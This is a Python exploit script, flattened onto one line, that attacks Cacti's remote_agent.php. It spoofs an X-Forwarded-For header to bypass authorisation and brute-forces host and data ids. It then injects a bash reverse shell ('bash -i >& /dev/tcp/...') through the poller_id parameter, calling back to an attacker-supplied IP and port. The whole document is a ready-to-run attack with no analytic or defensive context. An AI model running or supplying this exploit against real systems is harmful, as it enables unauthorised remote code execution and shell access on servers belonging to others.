import requests import urllib.parse def checkVuln(): result = requests.get(vulnURL, headers=header) return (result.text != "FATAL: You are not authorized to use this service" and result.status_code == 200) def bruteForce(): # brute force to find host id and local data id for i in range(1, 5): for j in range(1, 10): vulnIdURL = f"{vulnURL}?action=polldata&poller_id=1&host_id={i}&local_data_ids[]={j}" result = requests.get(vulnIdURL, headers=header) if result.text != "[]": # print(result.text) rrdName = result.json()[0]["rrd_name"] if rrdName == "polling_time" or rrdName == "uptime": return True, i, j return False, -1, -1 def remoteCodeExecution(payload, idHost, idLocal): encodedPayload = urllib.parse.quote(payload) injectedURL = f"{vulnURL}?action=polldata&poller_id=;{encodedPayload}&host_id={idHost}&local_data_ids[]={idLocal}" result = requests.get(injectedURL,headers=header) print(result.text) if __name__ == "__main__": targetURL = input("Enter the target address (like '')") vulnURL = f"{targetURL}/remote_agent.php" # X-Forwarded-For value should be something in the database of Cacti header = {"X-Forwarded-For": ""} print("Checking vulnerability...") if checkVuln(): print("App is vulnerable") isVuln, idHost, idLocal = bruteForce() print("Brute forcing id...") # RCE payload ipAddress = "" ipAddress = input("Enter your IPv4 address") port = input("Enter the port you want to listen on") payload = f"bash -c 'bash -i >& /dev/tcp/{ipAddress}/{port} 0>&1'" if isVuln: print("Delivering payload...") remoteCodeExecution(payload, idHost, idLocal) else: print("RRD not found") else: print("Not vulnerable")